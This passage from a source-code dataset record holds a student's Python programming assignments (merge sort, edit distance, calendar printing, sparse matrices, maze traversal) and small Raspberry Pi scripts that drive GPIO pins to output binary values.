#assert:string does not have an integer or a decimal\r\n    return False\r\n\r\n#readNumber is the function asked in problem statement\r\ndef readNumber(s,i):\r\n    #assert:s[i] is an integer\r\n    j=i+1\r\n    a=len(s)\r\n    while (j!=a and isint(s[j])):\r\n        #invariant: s[i:j] contains an integer or a float and j is not equal to a\r\n        j+=1\r\n    return (s[i:j],j)\r\n\r\n#signeval takes two floats x,y, identifies the sign in string a and performs the required computation\r\ndef signeval(x,y,a):\r\n    if a=='+':\r\n        return x+y\r\n    if a=='-':\r\n        return x-y\r\n    if a=='*':\r\n        return x*y\r\n    if a=='/':\r\n        return x/y\r\n\r\n#evalParen is the function asked in problem statement\r\ndef evalParen(s,i):\r\n    #assert: the input inside brackets may be of four forms\r\n    #'sign may be other than +'\r\n    #case1 : ()+x \r\n    #case2 : ()+()\r\n    #case3 : x+y\r\n    #case4 : x+()\r\n    # only (x) does not make sense \r\n    if s[i+1]=='(':\r\n        #assert: case 1 or case 2 have to be tackled\r\n        (a,b)=evalParen(s,i+1)\r\n        #assert: s[b] contains the operator according to which operation has to be done\r\n        if s[b+1]=='(':\r\n            #assert: case 2 has to be tackled\r\n            (c,d)=evalParen(s,b+1)\r\n            return (signeval(float(a),float(c),s[b]),d+1)\r\n        #assert: case 1 has to be tackled\r\n        (c,d)=readNumber(s,b+1)\r\n        return (signeval(float(a),float(c),s[b]),d+1)\r\n    #assert: either case 3 or case 4\r\n    (a,b)=readNumber(s,i+1)\r\n    if isint(s[b+1])==True:\r\n        #assert: case 3 has to be tackled\r\n        (c,d)=readNumber(s,b+1)\r\n        return (signeval(float(a),float(c),s[b]),d+1)\r\n    #assert: case 4 has to be tackled\r\n    (e,f)=evalParen(s,b+1)\r\n    return (signeval(float(a),float(e),s[b]),f+1)\r\n\r\n#evaluate is the function asked in problem statement\r\ndef evaluate(s):\r\n    #assert: there are two cases for the input\r\n    #case1: single number\r\n    #case2: combination like x+y or x+() or ()+x\r\n    if isint(s[0]):\r\n        (a,b)=readNumber(s,0)\r\n        if len(s)==b:\r\n            #assert: this 
is case1\r\n            return a\r\n    #assert:case2 is the only case left\r\n    #in this case brackets can be added to the string and evalParen can be used\r\n    s='('+s+')'\r\n    (b,c)=evalParen(s,0)\r\n    return b\r\n\r\n\r\n#problem 2\r\n\r\n# sumcheck checks whether x can be represented as a sum of two distinct numbers from l in a unique way\r\ndef sumcheck(x,l):\r\n    count=0\r\n    for i in range(len(l)):\r\n        #invariant 1: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l, one of the numbers having index between 0,i-1\r\n        for j in range(i+1,len(l)):\r\n            #invariant 2: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l, (one being from 0,i-1) or (one being i and other between i+1,j-1)\r\n            if x==l[i]+l[j] :\r\n                count+=1\r\n                if count>=2 :\r\n                    # assert: x can be represented as sum of two distinct numbers from l in more than one way\r\n                    return False\r\n        #assert: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l, one of the numbers having index between 0,i\r\n    #assert: count represents the number of ways in which the number x can be represented as a sum of two distinct numbers from l\r\n    if count==0:\r\n        #assert: x cannot be represented as sum of two distinct numbers from l in any way\r\n        return False\r\n    #assert count==1 and x can be represented as a sum of two distinct numbers from l in a unique way\r\n    return True\r\n\r\n\r\n# next term provides the next term of the given sequence\r\ndef nextterm(l):\r\n    x=l[-1]+1\r\n    while (not sumcheck(x,l)):\r\n        #invariant: all numbers between l[-1] and x including x cannot be part of the sequence\r\n        x+=1\r\n    #assert: x satisfies sumcheck(x,l) and all numbers between l[-1] and x do not satisfy hence x is next term of the sequence\r\n    return x\r\n    \r\n# sumSequence provides the required list\r\ndef sumSequence(n):\r\n    a=[1,2]\r\n    while len(a)!=n:\r\n        #len(a)!=n hence more terms have to be appended to list a \r\n        a.append(nextterm(a))\r\n    # assert len(a)==n and a contains the numbers of the asked sequence\r\n    return a \r\n\r\n\r\n#problem 3\r\n\r\ndef sumlist(l):\r\n    sum=l[0]\r\n    for i in range(len(l)-1):\r\n        # invariant: sum = sum of all elements till index i of the list at start of loop\r\n        sum+=l[i+1]\r\n    #assert sum = sum of all elements in the list\r\n    return sum\r\n\r\ndef min(a,b):\r\n    if a<=b: return a\r\n    else : return b\r\n    #assert min returns minimum of a and b\r\n\r\ndef minLength(a,n):\r\n    ans=len(a)+2\r\n    # at start ans is unrealistic so that (*does not exist case*) may be detected\r\n    for i in range(len(a)):\r\n        # invariant 1: ans is the least length of a contiguous list whose sum>n and starts from index 0..i-1 if such list exists\r\n        for j in range(i,len(a)):\r\n            # invariant 2: ans is the least length of a contiguous list whose sum>n and starts from index 0..i-1 or starts at index i and is contained in a[i:j] if such list exists\r\n            if sumlist(a[i:j+1])>n :\r\n                ans=min(ans,len(a[i:j+1]))\r\n        #assert: ans is the least length of a contiguous list whose sum>n and starts from index 0...i if such list exists\r\n    # assert: ans is the least length of a contiguous list whose sum>n if such list exists; if no such list exists then ans=len(a)+2\r\n    if ans == len(a) +2 :\r\n        #assert no such contiguous list exists\r\n        return -1\r\n    else :\r\n        #assert the minimum length of the contiguous list is ans\r\n        return ans\r\n\r\n\r\n# problem 4\r\n\r\n\r\n# Merges two subarrays of arr[] and writes the output to 
b[l:r]\n# First subarray is arr[l:m] # Second subarray is arr[m:r]\ndef mergeAB(arr,b, l, m, r):\n    i = l # Initial index of first subarray\n    j = m # Initial index of second subarray\n    k = l # Initial index of merged subarray\n    while i < m and j < r :\n        #invariant: list b from index l to k-1 is sorted\n        if arr[i] <= arr[j]:\n            b[k] = arr[i]\n            i += 1\n        else:\n            b[k] = arr[j]\n            j += 1\n        k += 1\n    while i < m:\n        # Copy the remaining elements of arr[i:m], if there are any\n        b[k] = arr[i]\n        i += 1\n        k += 1\n    while j < r:\n        # Copy the remaining elements of arr[j:r], if there are any\n        b[k] = arr[j]\n        j += 1\n        k += 1\n\n\ndef mergeit(A,B,n,l):\n    # A of size n consists of n/l sorted lists of size l each [last list may be shorter]\n    # merge them in pairs writing the result to B [there may be one unpaired if not even]\n    if n%l == 0:\n        count=n//l\n    else:\n        count=n//l + 1\n    for i in range( count//2 ):\n        # invariant: all the elements up to 2*i*l have been copied into b as i sorted lists of length 2l each\n        left=i*l*2\n        right=min(left+2*l,n) # since last list could be shorter\n        mergeAB(A,B,left,left+l,right)\n    # Copy the last list if there is any (may happen if count is odd)\n    for i in range(right,n):\n        #assert: count was odd hence one list could not be paired with others\n        B[i]=A[i]\n\ndef mergeSort(A):\n    n=len(A)\n    l=1\n    B=[0 for x in range(n)]\n    dir=0\n    while l < n:\n        #invariant: A or B according to value of dir contain n/l sorted lists of size l each [last list may be shorter]\n        if dir == 0:\n            #we have to copy result from A to B\n            mergeit(A,B,n,l)\n            dir=1\n        else:\n            #we have to copy result from B to A\n            mergeit(B,A,n,l)\n            dir=0\n        l*=2\n    #if result is in B copy result to A\n    if dir==1:\n        for i in range(n):\n            A[i]=B[i]\n\ndef mergeContacts(l):\n    mergeSort(l)\n    #assert: list is sorted hence same names will occur consecutively\n    #assert: list is not empty\n    (a,b)=l[0]\n    l[0]=(a,[b])\n    ans=[l[0]]\n    for i in range(1,len(l)):\n        #invariant: emails have been merged for all people having entries till index i-1 and appended to ans\n        (w,x)=l[i-1]\n        (y,z)=l[i]\n        if w==y:\n            #assert: l[i] and l[i-1] have the same names hence emails to be merged\n            (g,h)=ans[-1]\n            h.append(z)\n            ans[-1]=(g,h)\n        else:\n            l[i]=(y,[z])\n            ans.append(l[i])\n    #assert: ans contains merged result obtained from merging all entries with same names in l\n    return ans\r\n\r\n" }, { "alpha_fraction": 0.5297189354896545, "alphanum_fraction": 0.5453670024871826, "avg_line_length": 39.0098991394043, "blob_id": "79f63cb8d53b7c70fef121eaba1ddb0a62d0a49d", "content_id": "ddeb48529e570dffe97791d1e9ea5cee70b597b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8310, "license_type": "no_license", "max_line_length": 249, "num_lines": 202, "path": "/assg5 submitted.py", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "#2020CS10318\r\n#assignment 5\r\n#Akarsh Jain\r\n\r\n#problem 1\r\ndef gridPlay(grid):\r\n    m=len(grid[0]) #number of columns\r\n    n=len(grid) #number of rows\r\n    a=[grid[j] for j in range(n)]\r\n    for j in range(1,m):\r\n        #invariant: the entries from a[0][0] to a[0][j-1] represent the penalty in reaching that position\r\n        a[0][j]=grid[0][j]+a[0][j-1]\r\n    for i in range(1,n):\r\n        #invariant: the entries from a[0][0] to a[i-1][0] represent the penalty in reaching that position\r\n        
a[i][0]=grid[i][0]+ a[i-1][0] \r\n    for i in range(1,n):\r\n        #invariant: the entries in a till a[i-1] (i-1 th row) represent the penalty in reaching that position\r\n        for j in range(1,m):\r\n            #invariant: the entries in a till a[i][j-1] represent the penalty in reaching that position\r\n            a[i][j]=min(a[i-1][j],a[i-1][j-1],a[i][j-1])+grid[i][j]\r\n            #assert: the entries in a till a[i][j] represent the penalty in reaching that position\r\n        #assert: the entries in a till a[i] (i th row) represent the penalty in reaching that position\r\n    \r\n    #assert: the penalty faced is the value of entry a[n-1][m-1] by invariant\r\n    return a[n-1][m-1]\r\n\r\n#problem 2\r\n\r\n# this function checks whether the input is a vowel or a consonant\r\ndef vowel(n):\r\n    if n in ['a','e','i','o','u']:\r\n        return True\r\n    return False\r\n    \r\ndef stringProblem(a,b):\r\n    #assert: a,b are non-empty strings\r\n    A=[[0 for i in range(len(b)+1)] for j in range(len(a)+1)]\r\n    # character b[j-1] represents jth index column (column starting from 0)\r\n    # character a[i-1] represents ith index row (row starting from 0) \r\n    for i in range(len(b)+1): # reason for doing this loop is written at the end of this function **\r\n        A[0][i]=i\r\n    for j in range(len(a)+1):\r\n        A[j][0]=j\r\n    for i in range(1,len(a)+1):\r\n        #invariant: A[x][y] represents the min. number of changes to convert string a[0:x] to b[0:y] for x<i\r\n        for j in range(1,len(b)+1):\r\n            #invariant: A[x][y] represents the min. number of changes to convert string a[0:x] to b[0:y] for x<i+1,y<j\r\n            if a[i-1]==b[j-1]:\r\n                # since the two characters are already equal min no. changes will be the changes required to change the remaining list\r\n                A[i][j]=A[i-1][j-1]\r\n            else:\r\n                if vowel(a[i-1]):\r\n                    if vowel(b[j-1]):\r\n                        # min of three possibilities either replace a[i-1] by b[j-1] or delete a[i-1] or insert b[j-1]\r\n                        A[i][j]=1+min(A[i-1][j],A[i][j-1],A[i-1][j-1])\r\n                        # A[i-1][j] represent deletion of element from string a\r\n                        # A[i][j-1] represents insertion of an element in string a and then since the elements will be equal min changes in the remaining part of the string have to be found out\r\n                        # A[i-1][j-1] represents replacement of a[i-1] by b[j-1]\r\n                    else:\r\n                        # min of two possibilities either delete a[i-1] or insert b[j-1]\r\n                        # replacement is not possible in this case\r\n                        A[i][j]=1+min(A[i-1][j],A[i][j-1])\r\n                else:\r\n                    # min of three possibilities either replace a[i-1] by b[j-1] or delete a[i-1] or insert b[j-1]\r\n                    A[i][j]=1+min(A[i-1][j],A[i][j-1],A[i-1][j-1])\r\n            #assert: A[x][y] represents the min. 
number of changes to convert string a[0:x] to b[0:y] for x<i,y<j+1\r\n        #assert: A[x][y] represents the min. number of changes to convert string a[0:x] to b[0:y] for x<i+1\r\n    return A[len(a)][len(b)]\r\n# ** Reason for doing the middle loop: the first row and first column of the matrix are there for the case in which deletion of element occurs and one of the strings gets empty and then min changes will be the number of elements in the other string.\r\n# explained with greater detail in .pdf file\r\n\r\n\r\n\r\n#problem 3\r\n\r\n# this checks whether n is a leap year or not\r\ndef isleap(n):\r\n    if n%4 != 0:\r\n        return False\r\n    if n%400==0:\r\n        return True\r\n    if n%100==0:\r\n        return False\r\n    return True\r\n\r\n#this calculates the day of 1st january for an input year n (1 is monday,2 tuesday....)\r\ndef jan(n):\r\n    # initially count is 1, representing that 1st jan 1753 was a monday\r\n    count=1\r\n    a=n-1\r\n    while a>=1753:\r\n        if isleap(a):\r\n            count+=2\r\n            #since 366%7=2 hence count must be altered by 2\r\n        else:\r\n            count+=1\r\n            #since 365%7=1 hence count must be altered by 1\r\n        a-=1\r\n    if count%7==0:\r\n        #this is introduced since days starting from 1\r\n        return 7\r\n    return count%7\r\n\r\n\r\nmlist={1:'January',2:'February',3:'March',4:'April',5:'May',6:'June',7:'july',8:'August',9:'September',10:'October',11:'November',12:'December'}\r\n\r\n# monumber gives the number of days in a month\r\ndef monumber(n,x):\r\n    # n is the month number from mlist\r\n    # x is the year \r\n    if n==1 or n==3 or n==5 or n==7 or n==8 or n==10 or n==12 :\r\n        return 31\r\n    if n==2:\r\n        if isleap(x):\r\n            return 29\r\n        else:\r\n            return 28\r\n    return 30\r\n\r\n#mostart gives the day on which the month will start\r\ndef mostart(a,b):\r\n    #a= month number from mlist\r\n    #b= year\r\n    i=1\r\n    s=jan(b)\r\n    while i<a:\r\n        if (s+monumber(i,b))%7==0:\r\n            #this case had to be made since days have been considered numbered from 1 to 7. so 0 must represent 7\r\n            s=7\r\n        else:\r\n            s=(s+monumber(i,b))%7\r\n        i+=1\r\n    return s\r\n\r\n#nextweek gives the date from which next week of a month is to be started\r\ndef nextweek(a,b):\r\n    #a is the start date of previous week ( in case of first week it is 1 )\r\n    #b is the start day of the previous week\r\n    return 8+a-b\r\n\r\n\r\n# month writes to the file f a set of three months side by side i.e. with month numbers a,a+1,a+2 \r\ndef month(a,b,f):\r\n    #a=month set to be printed is a,a+1.a+2\r\n    #b=year\r\n    #f=file in which calendar is made\r\n    # x1,x2 | y1,y2 | z1,z2 represent the starting day and starting date for each of the side by side months\r\n    x1=mostart(a,b) \r\n    x2=1 \r\n    y1=mostart(a+1,b)\r\n    y2=1\r\n    z1=mostart(a+2,b)\r\n    z2=1\r\n    f.write('{:^21}{:^25}{:^21}'.format(mlist[a],mlist[a+1],mlist[a+2])+'\\n') \r\n    f.write('{:<21}{:^25}{:>21}'.format(' M T W T F S S',' M T W T F S S',' M T W T F S S')+'\\n')\r\n    for i in range(1,7):\r\n        #i represents the week number \r\n        for k in range(x1-1):\r\n            #this leaves spaces when the week does not start from monday (e.g jan 1 comes on thursday)\r\n            f.write(' ')\r\n        for j in range(x2,8-x1+x2):\r\n            #this prints the dates of a week\r\n            if j<=monumber(a,b):\r\n                f.write(' {0:0=2d}'.format(j))\r\n            else:\r\n                # this means that all dates coming in a month have been written. 
just for proper formatting spaces are introduced\r\n f.write(' ')\r\n f.write(' ')\r\n # same for month a+1\r\n for k in range(y1-1):\r\n f.write(' ')\r\n for j in range(y2,8-y1+y2):\r\n if j<=monumber(a+1,b): \r\n f.write(' {0:0=2d}'.format(j))\r\n else:\r\n f.write(' ')\r\n f.write(' ')\r\n #same for month a+2\r\n for k in range(z1-1):\r\n f.write(' ')\r\n for j in range(z2,8-z1+z2):\r\n if j<=monumber(a+2,b):\r\n f.write(' {0:0=2d}'.format(j))\r\n else:\r\n f.write(' ')\r\n f.write('\\n')\r\n # x2,y2,z2 representing dates are assigned new values using nextweek function\r\n x2=nextweek(x2,x1)\r\n y2=nextweek(y2,y1)\r\n z2=nextweek(z2,z1)\r\n # x1,x2,x3 will be 1 because start day of further weeks will be monday \r\n x1=1\r\n y1=1\r\n z1=1\r\n\r\ndef printCalendar(n):\r\n with open('calendar.txt','x') as f:\r\n f.write('{:^67}'.format(n)+'\\n') #writes the year on top of calendar\r\n for i in [1,4,7,10]:\r\n month(i,n,f)\r\n #by definition of month function it prints 3 months side by side. so eventually all 12 months will be printed\r\n f.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.4534986615180969, "alphanum_fraction": 0.4644227921962738, "avg_line_length": 37.81764602661133, "blob_id": "824621440c7a702dbf120724164cdb68fa3a6f5d", "content_id": "9c30a1f8562486b42ec5a49141bdb22e7ec860f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13548, "license_type": "no_license", "max_line_length": 143, "num_lines": 340, "path": "/assg 6 submitted.py", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "#Akarsh Jain\r\n# 2020CS10318\r\n#assignment 6\r\n\r\n#problem 1 \r\n\r\nclass Quiz:\r\n def __init__(self,title,answer):\r\n self.title=title\r\n self._answer=answer #list of answers\r\n self._attempts={} # this is a dictionary which stores (entryNo:response)\r\n def _score(self,student):\r\n # student input is the entryNo\r\n self._sc=0\r\n for i in range(len(self._answer)):\r\n if self._answer[i]==self._attempts[student][i]:\r\n self._sc+=1\r\n return self._sc #represents number of correct answers\r\n\r\n \r\nclass Course:\r\n def __init__(self,courseCode,Q_list):\r\n self.courseCode=courseCode\r\n self._Q_list=Q_list # list of quizzes\r\n\r\n\r\nclass Student:\r\n def __init__(self,entryNo,C_list):\r\n self.entryNo=entryNo\r\n self._C_list=C_list #list of courses student is taking\r\n def attempt(self,courseCode,quizTitle,attemptedAnswers):\r\n for course in self._C_list:\r\n if course.courseCode==courseCode:\r\n for quiz in course._Q_list:\r\n if quiz.title==quizTitle:\r\n if not self.entryNo in quiz._attempts: #checks whether already attempted \r\n quiz._attempts[self.entryNo]=attemptedAnswers #entry added to dictionary\r\n \r\n def getUnattemptedQuizzes(self):\r\n self._unattempt=[]\r\n for course in self._C_list:\r\n for quiz in course._Q_list:\r\n if not self.entryNo in quiz._attempts:\r\n self._unattempt.append((course.courseCode,quiz.title))\r\n return self._unattempt\r\n \r\n def getAverageScore(self,courseCode):\r\n self._sum=0\r\n self._number=0\r\n for course in self._C_list:\r\n if course.courseCode==courseCode:\r\n for quiz in course._Q_list:\r\n if self.entryNo in quiz._attempts:\r\n self._sum+=quiz._score(self.entryNo)\r\n self._number+=1\r\n #self._sum is the total of all attempted quizzes\r\n #self._number is the number of attempted quizzes\r\n return self._sum/self._number\r\n\r\n\r\n#problem 2\r\nclass Matrix:\r\n def __init__(self,l):\r\n 
self.list=l # gives the matrix in list of list dense form\r\n    def __str__(self):\r\n        for row in self.list:\r\n            for item in row:\r\n                print('{} '.format(item),end='')\r\n            print('\\n')\r\n        return ''\r\n    def rows(self):\r\n        return len(self.list) #number of rows\r\n    def coloumns(self):\r\n        return len(self.list[0]) #number of columns\r\n    def __add__(self,a):\r\n        n=self.rows()\r\n        m=self.coloumns()\r\n        x=[[(self.list[i][j]+a.list[i][j]) for j in range(m)] for i in range(n)]\r\n        return Matrix(x)\r\n    def __sub__(self,a):\r\n        n=self.rows()\r\n        m=self.coloumns()\r\n        x=[[(self.list[i][j]-a.list[i][j]) for j in range(m)] for i in range(n)]\r\n        return Matrix(x)\r\n    def __mul__(self,x):\r\n        a=self.rows()\r\n        b=self.coloumns()\r\n        assert len(x.list)==b\r\n        c=len(x.list[0])\r\n        aux=[[0 for i in range(c)]for j in range(a)]\r\n        for i in range(c):\r\n            for j in range(a):\r\n                for k in range(b):\r\n                    aux[j][i]+=(self.list[j][k]*x.list[k][i])\r\n        return Matrix(aux)\r\n    def toSparse(self):\r\n        l=[]\r\n        for i in range(self.rows()):\r\n            s=[]\r\n            for j in range(self.coloumns()):\r\n                if self.list[i][j]!=0:\r\n                    #if it was 0 then no need to be written in the sparse form\r\n                    s.append((j,self.list[i][j]))\r\n            l.append(s)\r\n        return SparseMatrix(l,self.rows(),self.coloumns())\r\n        \r\nclass SparseMatrix:\r\n    def __init__(self,sparse_matrix,n_rows,n_cols):\r\n        self.list=sparse_matrix\r\n        self.row=n_rows\r\n        self.col=n_cols\r\n    def __str__(self):\r\n        for i in range(self.row):\r\n            #prev represents the index after which the last non-zero element ended\r\n            prev=0\r\n            for j in range(len(self.list[i])):\r\n                (a,b)=self.list[i][j]\r\n                for k in range(prev,a):\r\n                    print ('0 ',end='')\r\n                print ('{} '.format(b),end='')\r\n                prev=a+1\r\n            for k in range(prev,self.col):\r\n                print('0 ',end='')\r\n            print('\\n')\r\n        return '' \r\n\r\n    def __add__(self,other):\r\n        l=[[] for j in range(self.row)]\r\n        for i in range(self.row):\r\n            for j in range(self.col):\r\n                #inp1 represents what value self has at ith row and jth column \r\n                #inp2 represents what value other has at ith row and jth column\r\n                inp1=0 \r\n                inp2=0\r\n                for k in range(len(self.list[i])):\r\n                    (a,b)=self.list[i][k]\r\n                    if j==a:\r\n                        #assert:self has non-zero value ith row jth column\r\n                        inp1=b\r\n                        break\r\n                for k in range(len(other.list[i])):\r\n                    (a,b)=other.list[i][k]\r\n                    if j==a:\r\n                        #assert:other has non-zero value ith row jth column\r\n                        inp2=b\r\n                        break\r\n                if inp1!=0:\r\n                    if inp2!=0:\r\n                        #assert: both of them are non-zero hence sum is appended\r\n                        l[i].append((j,inp1+inp2))\r\n                    else:\r\n                        #assert: only inp1 is non-zero hence appended\r\n                        l[i].append((j,inp1))\r\n                else:\r\n                    if inp2!=0:\r\n                        #assert: only inp2 is non-zero hence appended\r\n                        l[i].append((j,inp2))\r\n                #assert: if both inp1 and inp2 are 0 then no need to append \r\n        return SparseMatrix(l,self.row,self.col)\r\n    def __sub__(self,other):\r\n        l=[[] for j in range(self.row)]\r\n        for i in range(self.row):\r\n            for j in range(self.col):\r\n                #inp1 represents what value self has at ith row and jth column \r\n                #inp2 represents what value other has at ith row and jth column\r\n                inp1=0\r\n                inp2=0\r\n                for k in range(len(self.list[i])):\r\n                    (a,b)=self.list[i][k]\r\n                    if j==a:\r\n                        #assert:self has non-zero value ith row jth column\r\n                        inp1=b\r\n                        break\r\n                for k in range(len(other.list[i])):\r\n                    (a,b)=other.list[i][k]\r\n                    if j==a:\r\n                        #assert:other has non-zero value ith row jth column\r\n                        inp2=b\r\n                        break\r\n                if inp1!=0:\r\n                    if inp2!=0:\r\n                        #assert: both of them are non-zero hence difference is appended\r\n                        
l[i].append((j,inp1-inp2))\r\n                    else:\r\n                        #assert: only inp1 is non-zero hence appended\r\n                        l[i].append((j,inp1))\r\n                else:\r\n                    if inp2!=0:\r\n                        #assert: only inp2 is non-zero hence 0-inp2 appended\r\n                        l[i].append((j,-inp2))\r\n                #assert: if both inp1 and inp2 are 0 then no need to append\r\n        return SparseMatrix(l,self.row,self.col)\r\n    def __mul__(self,other):\r\n        a=self.row\r\n        b=self.col\r\n        assert other.row==b\r\n        c=other.col\r\n        X=[[] for i in range(a)]\r\n        for i in range(a):\r\n            for j in range(c):\r\n                #iteration is performed for all ith rows and jth columns\r\n                val=0 #this is the sum of products of elements in ith row and jth column\r\n                for k in range(b):\r\n                    #inp1 represents what value self has at ith row and kth column \r\n                    #inp2 represents what value other has at kth row and jth column\r\n                    inp1=0 \r\n                    inp2=0\r\n                    for x in range(len(self.list[i])):\r\n                        (p,q)=self.list[i][x]\r\n                        if k==p:\r\n                            #ith row and kth column entry is non-zero\r\n                            inp1=q\r\n                            break\r\n                    for x in range(len(other.list[k])):\r\n                        (p,q)=other.list[k][x]\r\n                        if j==p:\r\n                            #kth row and jth column entry is non-zero\r\n                            inp2=q\r\n                            break\r\n                    if inp1!=0:\r\n                        if inp2!=0:\r\n                            #assert: both of them are non-zero hence product is added to val\r\n                            val+=inp1*inp2 \r\n                if val!=0:\r\n                    #if val was zero then there was no need to append\r\n                    X[i].append((j,val))\r\n        return SparseMatrix(X,a,c)\r\n    #nth_row function is only used in dense matrix conversion\r\n    #nth_row gives the nth row with the zero elements (in dense form)\r\n    def nth_row(self,n):\r\n        #this gives the nth row of the matrix with zero elements also\r\n        A=[0 for i in range(self.col)]\r\n        for item in self.list[n]:\r\n            (a,b)=item\r\n            A[a]=b\r\n        return A\r\n    def toDense(self):\r\n        D=[self.nth_row(j) for j in range(self.row)]\r\n        return Matrix(D)\r\n\r\n\r\n#problem 3\r\n\r\n#move function appends the new position to the list and marks previous position as 'X' (to avoid circular motion)\r\ndef move(arr,lis,di):\r\n    (a,b)=lis[-1]\r\n    if di==0: #right movement\r\n        lis.append((a,b+1))\r\n        arr[a][b]='X'\r\n    if di==1: #down movement\r\n        lis.append((a+1,b))\r\n        arr[a][b]='X'\r\n    if di==2: #left movement\r\n        lis.append((a,b-1))\r\n        arr[a][b]='X'\r\n    if di==3: #up movement\r\n        lis.append((a-1,b))\r\n        arr[a][b]='X'\r\n\r\n#goodFormat makes the list look good by replacing movements by 'U','D','R','L'\r\ndef goodFormat(s):\r\n    for i in range(1,len(s)):\r\n        #invariant: elements before index i-1 are converted to 'good' form\r\n        (a,b)=s[i-1]\r\n        (c,d)=s[i]\r\n        if a==c:\r\n            #assert: movement from s[i-1] to s[i] was either right or left\r\n            if b==d+1:\r\n                #assert: movement from s[i-1] to s[i] was left\r\n                s[i-1]='L'\r\n            else:\r\n                #assert: movement from s[i-1] to s[i] was right\r\n                s[i-1]='R'\r\n        if a==c+1:\r\n            #assert: movement from s[i-1] to s[i] was up\r\n            s[i-1]='U'\r\n        if a+1==c:\r\n            #assert: movement from s[i-1] to s[i] was down\r\n            s[i-1]='D'\r\n    s.pop() # last element is popped since it is the location of 'E' and no further movements are to be made\r\n\r\ndef traverseMaze(file):\r\n    #assert:maze is solvable\r\n    with open(file) as f:\r\n        temp=f.readlines() #temp is a temporary list to store the strings\r\n        f.close()\r\n    l=[]\r\n    for item in temp:\r\n        a=item.split(' ')\r\n        if a[-1]=='X\\n': #this condition is made since the last element of each row has unwanted \\n (used for moving to next line) \r\n            a[-1]='X'\r\n        if a[-1]=='E\\n':\r\n            a[-1]='E'\r\n        if a[-1]=='S\\n':\r\n            a[-1]='S'\r\n        if a[-1]=='_\\n':\r\n            a[-1]='_'\r\n        l.append(a)\r\n    # the list of lists l now 
contains the maze\r\n    a=len(l[0])\r\n    b=len(l)\r\n    for i in range(b): # to find start and end position\r\n        for j in range(a):\r\n            if l[i][j]=='S':\r\n                pos=(i,j) #this is starting position\r\n            if l[i][j]=='E':\r\n                lt=(i,j) #this is the end point\r\n    s=[pos] #this is a list to store positions visited. last element is the current position\r\n    arr=[[l[j][i] for i in range(a)] for j in range(b)] #duplicate maze\r\n    (i,j)=pos\r\n    while s[-1]!=lt:\r\n        #invariant: all elements in list s do not represent position having 'E'\r\n        if i>=1 and (arr[i-1][j]=='_' or arr[i-1][j]=='E'):\r\n            move(arr,s,3)\r\n            # moves up in the array\r\n            i-=1\r\n            continue\r\n        if j>=1 and (arr[i][j-1]=='_' or arr[i][j-1]=='E'):\r\n            move(arr,s,2)\r\n            # moves left in the array\r\n            j-=1\r\n            continue\r\n        if i<b-1 and (arr[i+1][j]=='_' or arr[i+1][j]=='E'):\r\n            move(arr,s,1)\r\n            # moves down in the array\r\n            i+=1\r\n            continue\r\n        if j<a-1 and (arr[i][j+1]=='_' or arr[i][j+1]=='E'):\r\n            move(arr,s,0)\r\n            # moves right in the array\r\n            j+=1\r\n            continue\r\n        #assert: the current position has walls on all sides. Hence we must go back to previous position and choose some other path to go.\r\n        (c,d)=s[-1]\r\n        s.pop()\r\n        arr[c][d]='X' #current position is marked as 'X' so as not to repeat visits\r\n        (i,j)=s[-1] #setting up i and j for next iteration of the loop\r\n    #assert: the last element in s represents position with 'E'\r\n    goodFormat(s)\r\n    return s\r\n    \r\n" } ]
4
Axalexan/raspberrypi
https://github.com/Axalexan/raspberrypi
b1af30b2ffd399766336bc1512ef759912e6fa89
14d95252a2e027e83e64ad434be0a4c5844b1b5d
753e99950dedacccc51ab3d47795a366ee277d9e
refs/heads/master
2023-04-03T08:12:35.396812
2021-04-12T15:31:37
2021-04-12T15:31:37
347,970,796
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43784376978874207, "alphanum_fraction": 0.5104510188102722, "avg_line_length": 18.7391300201416, "blob_id": "ad1db6ad9182e0dbe0de7bbeb827308b54acce04", "content_id": "608e04d66fb0b57fb920c819ee82e966982a910b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 909, "license_type": "no_license", "max_line_length": 53, "num_lines": 46, "path": "/12_04_sc1.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10, 17]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 2:11, 1:9, 0:10}\n\nGPIO.output(17, 1)\n\n\ndef decToBinList(decNumber):\n    s = []\n    while decNumber > 0:\n        s.append(decNumber % 2)\n        decNumber //= 2\n    while len(s) < 8:\n        s.append(0)\n    a = []\n    for i in range(len(s) - 1, -1, -1):\n        a.append(s[i])\n    return s\n\ndef num2dec(value):\n    k = decToBinList(value)\n    for i in range(8):\n        if k[i] == 1:\n            GPIO.output(numbers[i],1)\n\n\n\ntry:\n    while True:\n\n        print('Enter value (-1 to exit)')\n        i = int(input())\n        if i == -1:\n            break\n        print(i ,' = ', round(3.3*(i/255),2) ,'V')\n        GPIO.output(chan_list,0)\n        GPIO.output(17,1)\n        num2dec(i)\n        time.sleep(0.1)\nfinally:\n    GPIO.cleanup()\n\n" }, { "alpha_fraction": 0.44948065280914307, "alphanum_fraction": 0.5108593106269836, "avg_line_length": 20.326923370361328, "blob_id": "9b6ead46a8369804eccba1061be7be88cc626731", "content_id": "4fb0bacd65369acdb46b57da35ad3d6628bf78d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 53, "num_lines": 52, "path": "/kek.py", "repo_name": "Axalexan/raspberrypi", "src_encoding": "UTF-8", "text": "import RPi.GPIO as GPIO\nimport time\nchan_list = [26, 19, 13, 6, 5, 11, 9, 10]\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(chan_list, GPIO.OUT)\n\n\nnumbers={7:26, 6:19, 5:13, 4:6, 3:5, 